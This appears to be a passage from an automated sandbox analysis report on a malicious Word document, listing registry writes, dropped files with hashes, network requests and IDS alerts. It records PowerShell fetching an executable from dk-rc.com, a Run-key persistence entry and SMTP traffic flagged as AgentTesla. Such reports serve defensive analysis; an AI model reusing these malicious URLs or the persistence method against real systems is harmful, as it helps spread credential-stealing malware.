MV Boli
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
26095169
492
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
492
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
492
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
492
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3672
yb264b.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3672
yb264b.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3672
yb264b.exe
write
HKEY_CURRENT_USER
-boot
2324
opera.exe
write
HKEY_CURRENT_USER\Software\Opera Software
Last CommandLine v2
C:\Program Files\Opera\opera.exe
2324
opera.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
3788
yb264b.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
MyOMOTASY
C:\Users\admin\AppData\Roaming\MyOMOTASY\MyOMOTASY.exe
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASAPI32
EnableFileTracing
0
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASAPI32
EnableConsoleTracing
0
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASAPI32
FileTracingMask
4294901760
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASAPI32
ConsoleTracingMask
4294901760
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASAPI32
MaxFileSize
1048576
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASAPI32
FileDirectory
%windir%\tracing
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASMANCS
EnableFileTracing
0
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASMANCS
EnableConsoleTracing
0
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASMANCS
FileTracingMask
4294901760
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASMANCS
ConsoleTracingMask
4294901760
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASMANCS
MaxFileSize
1048576
3788
yb264b.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\yb264b_RASMANCS
FileDirectory
%windir%\tracing
3788
yb264b.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US

Files activity

Executable files
2
Suspicious files
25
Text files
14
Unknown types
6

Dropped files

PID
Process
Filename
Type
3788
yb264b.exe
C:\Users\admin\AppData\Roaming\MyOMOTASY\MyOMOTASY.exe
executable
MD5: 5f5fedb71b12f1cfb4c2b175a7504024
SHA256: cdc6b63d19637a4b99a7e1843b841473b6d42d6b2ce211a2e2b5430b3c11217f
492
powershell.exe
C:\Users\admin\AppData\Roaming\yb264b.exe
executable
MD5: 5f5fedb71b12f1cfb4c2b175a7504024
SHA256: cdc6b63d19637a4b99a7e1843b841473b6d42d6b2ce211a2e2b5430b3c11217f
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml
xml
MD5: ba1637032b698f41c6a6f24ab39cba9d
SHA256: 5d7e38ccf3a4d9406c9329599d9acdb4c25206825e852ced25dd4f26faef1d35
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win.bak
text
MD5: 77c78e018bc80d4c06f7c36dc6c0e9fb
SHA256: 83d554e0ecbfb141cf4e9906c7fc39da875f9fd716015188a7486611d5078126
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\opr8F90.tmp
––
MD5:  ––
SHA256:  ––
3788
yb264b.exe
C:\Users\admin\AppData\Local\Temp\637013106032208125_9e2e323a-0181-4f25-8117-b923eb9cba3c.db
sqlite
MD5: 0b3c43342ce2a99318aa0fe9e531c57b
SHA256: 0ccb4915e00390685621da3d75ebfd5edadc94155a79c66415a7f4e9763d71b8
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\global_history.dat
text
MD5: 43a105e5f5c130d3555b9cf5d197cee3
SHA256: 3501962048749db6c29aadfcde4567d3bc02a72576aea86820715d41a606b563
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win
text
MD5: 77c78e018bc80d4c06f7c36dc6c0e9fb
SHA256: 83d554e0ecbfb141cf4e9906c7fc39da875f9fd716015188a7486611d5078126
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\opr83C8.tmp
––
MD5:  ––
SHA256:  ––
2324
opera.exe
C:\Users\admin\AppData\Local\Opera\Opera\cache\sesn\opr00002.tmp
html
MD5: 7f077f1fce3d566040b0d69eb1f27d8f
SHA256: 487ad0d2cf075f4328a1adf57ef428759ad4e2c873a8ebd2ad9653990829c9cf
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml
xml
MD5: 1a20a6eab186d7934cd5f62d2e0c4406
SHA256: 11f14ef38b73a2b1fad04522d1fc604c806256e6bff827c5d40a08268be36f07
2324
opera.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\16ec093b8f51508f.customDestinations-ms
binary
MD5: 309173a3d7ac96e52ca7bb6e941c2cf1
SHA256: d0de40593bce48bb74d7df605809beaa2c8dc578294215278dceb978d10b4c6f
2324
opera.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\16ec093b8f51508f.customDestinations-ms~RF3818c7.TMP
binary
MD5: 309173a3d7ac96e52ca7bb6e941c2cf1
SHA256: d0de40593bce48bb74d7df605809beaa2c8dc578294215278dceb978d10b4c6f
2324
opera.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FIY7GOI0EGJROXX5T7PV.temp
––
MD5:  ––
SHA256:  ––
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat
binary
MD5: 7f5dcbf9f067f258078d5071195d5c51
SHA256: fec0be3946fe4780375cee50eb647bea4fb130af228e473fe442b39ff19d0492
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\optrust.dat
binary
MD5: 1aa8644c9261dc10f7247f6a145c1dd2
SHA256: 58a8933f65361633c6ab194000d312dc9d566f717b1a16814a0dbee24a60ebe3
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat
binary
MD5: b539d0af92719a818550a0814243266b
SHA256: 7c23bf544d0914ac91030e7580e24c8e73811f9cebc59409e5106e7abd0e248f
2324
opera.exe
C:\Users\admin\AppData\Local\Opera\Opera\cache\sesn\opr00001.tmp
––
MD5:  ––
SHA256:  ––
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcacrt6.dat
binary
MD5: 59761e989f564f76a3a4b778db7abcf1
SHA256: af879942d234d85c0ce75921dbdda50e2f6d135bd961f259106131751359052b
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opcert6.dat
binary
MD5: 1aa8644c9261dc10f7247f6a145c1dd2
SHA256: 58a8933f65361633c6ab194000d312dc9d566f717b1a16814a0dbee24a60ebe3
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opuntrust.dat
binary
MD5: 1aa8644c9261dc10f7247f6a145c1dd2
SHA256: 58a8933f65361633c6ab194000d312dc9d566f717b1a16814a0dbee24a60ebe3
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opssl6.dat
binary
MD5: e32deaacededc40b0e9a3672630b679c
SHA256: 10f6348a14a46b7d5db6c96d4508a6c9d317ed7ac2b95bdac2918637cc9d8fb1
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\opicacrt6.dat
binary
MD5: 82f1a2b1176a5ecc457d32301e2ad833
SHA256: a783052804dd4c232be2ed3dc00c430cb67a20370890e235562ed2b27b5a602e
2900
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRb2900.11024\b64867b16525cbe3dab4f81ddf2134bdfc2e7de62b1600cf7819ed88dc859eb0.bin
––
MD5:  ––
SHA256:  ––
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprD20.tmp
––
MD5:  ––
SHA256:  ––
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini
text
MD5: 5961e9aa21abf489606e2fd815176b63
SHA256: d3c754c37a2b89586337cc7090b2d5f248e1824c18bf2ab9f5780273c8df0c54
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\oprCE0.tmp
––
MD5:  ––
SHA256:  ––
2324
opera.exe
C:\Users\admin\AppData\Local\Opera\Opera\cache\CACHEDIR.TAG
text
MD5: e717f92fa29ae97dbe4f6f5c04b7a3d9
SHA256: 5bbd5dcbf87fd8cd7544c522badf22a2951cf010ad9f25c40f9726f09ea2b552
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\sessions\autosave.win
text
MD5: 0e81ed4a317290bb39d2b11896d88ee6
SHA256: c0bf661d16dc31ac0570b61bb80b10da3c9e28f781452d5cc243883a20030dbe
2648
csc.exe
C:\Users\admin\AppData\Local\Temp\df5laeek.out
––
MD5:  ––
SHA256:  ––
2648
csc.exe
C:\Users\admin\AppData\Local\Temp\df5laeek.dll
––
MD5:  ––
SHA256:  ––
4080
cvtres.exe
C:\Users\admin\AppData\Local\Temp\RES746A.tmp
––
MD5:  ––
SHA256:  ––
2648
csc.exe
C:\Users\admin\AppData\Local\Temp\CSC7459.tmp
––
MD5:  ––
SHA256:  ––
2648
csc.exe
C:\Users\admin\AppData\Local\Temp\df5laeek.pdb
––
MD5:  ––
SHA256:  ––
492
powershell.exe
C:\Users\admin\AppData\Local\Temp\df5laeek.0.cs
text
MD5: f9365e7fca1f466fa17c2845a7dace6f
SHA256: 1522ac4081958486c80fb598684a00aa09abcbb718fc5565506b7a703bcc16ad
492
powershell.exe
C:\Users\admin\AppData\Local\Temp\df5laeek.cmdline
text
MD5: 3519356d129aa2a9fd029124ad71957e
SHA256: 7deaecbae9adf15987740a9b98998d516de951bdfd9d29b6b63570fd48563160
492
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF37714c.TMP
binary
MD5: a25a3218432767d044a42dfb20430d13
SHA256: 89b8f26bbb4687757c87d5ef3d77646af493affcf68b572bd2d4d5ce07c97be7
492
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: a25a3218432767d044a42dfb20430d13
SHA256: 89b8f26bbb4687757c87d5ef3d77646af493affcf68b572bd2d4d5ce07c97be7
492
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S5NB67R8KW0KEEWGW118.temp
––
MD5:  ––
SHA256:  ––
3164
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: bf5190f8289d6bf67ad3f1dfc9ffc77c
SHA256: 7c4163d0118d50c17f74fbb366e9fdeb063e1de71c5137f36d4a89468e2c3217
3164
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ayy.doc.LNK
lnk
MD5: fe0af2099e868d65145001fcc7c9fe13
SHA256: b4713bb8208697a0f8e7a912a62ac4cb0bd90866b5d3b32ff80cf83371398a1c
3164
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29A934C7.emf
emf
MD5: bbfebafe2196aa9fb5703605dbc3de98
SHA256: 7dc39fd6b8a7b2d12bad858403a317e92810dac7309ba069ad8693ac08d0dff1
3164
WINWORD.EXE
C:\Users\admin\Desktop\~$ayy.doc
pgc
MD5: 4f83530e87b83c4217c6136fd3e1d7ae
SHA256: 128ce2281283b5cac36021a8f9b2e90f33dbcd3db0982993cc951427e82b52de
3164
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5: d24e9c9529ec40d102ac0805a130c67c
SHA256: 0814b2ddf3375ab2fae4aa5c7c09477c88225ef178058d53809193e016d07ceb
3164
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVR65D2.tmp.cvr
––
MD5:  ––
SHA256:  ––
2324
opera.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml
xml
MD5: 81aaa923752ce9e929d8b23c4daf107f
SHA256: f5fbb05539b5795c75275a8ad6ae6057edd060b84f7267e46d096dc49b0a9298

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
7
TCP/UDP connections
9
DNS requests
6
Threats
6

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
492 powershell.exe GET 200 162.144.12.172:80 http://dk-rc.com/js/Cool-Tue.exe US
executable
suspicious
2324 opera.exe GET 200 93.184.220.29:80 http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl US
der
whitelisted
2324 opera.exe GET –– 162.144.12.172:80 http://dk-rc.com/ US
––
––
suspicious
2324 opera.exe GET 400 185.26.182.111:80 http://sitecheck2.opera.com/?host=dk-rc.com&hdn=a9uiBCn4kkak4gCnM6qj0g== unknown
html
whitelisted
2324 opera.exe GET 200 162.144.12.172:80 http://dk-rc.com/js/ US
html
suspicious
2324 opera.exe GET 200 162.144.12.172:80 http://dk-rc.com/favicon.ico US
html
suspicious
3788 yb264b.exe GET 200 18.204.189.102:80 http://checkip.amazonaws.com/ US
text
shared

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
492 powershell.exe 162.144.12.172:80 Unified Layer US suspicious
2324 opera.exe 185.26.182.93:443 Opera Software AS –– unknown
2324 opera.exe 93.184.220.29:80 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
2324 opera.exe 162.144.12.172:80 Unified Layer US suspicious
2324 opera.exe 185.26.182.111:80 Opera Software AS –– whitelisted
3788 yb264b.exe 18.204.189.102:80 US shared
3788 yb264b.exe 64.37.54.190:587 HostDime.com, Inc. US unknown

DNS requests

Domain IP Reputation
dk-rc.com 162.144.12.172
suspicious
certs.opera.com 185.26.182.93
185.26.182.94
whitelisted
crl4.digicert.com 93.184.220.29
whitelisted
sitecheck2.opera.com 185.26.182.111
185.26.182.112
185.26.182.93
185.26.182.94
whitelisted
checkip.amazonaws.com 18.204.189.102
52.44.169.135
52.55.255.113
3.224.145.145
18.205.71.63
34.196.181.158
shared
mail.middleeast-ins.com 64.37.54.190
unknown

Threats

PID Process Class Message
492 powershell.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
492 powershell.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3788 yb264b.exe A Network Trojan was detected MALWARE [PTsecurity] AgentTesla IP Check
3788 yb264b.exe Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction

2 ETPRO signatures available at the full report

Debug output strings

Process Message
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
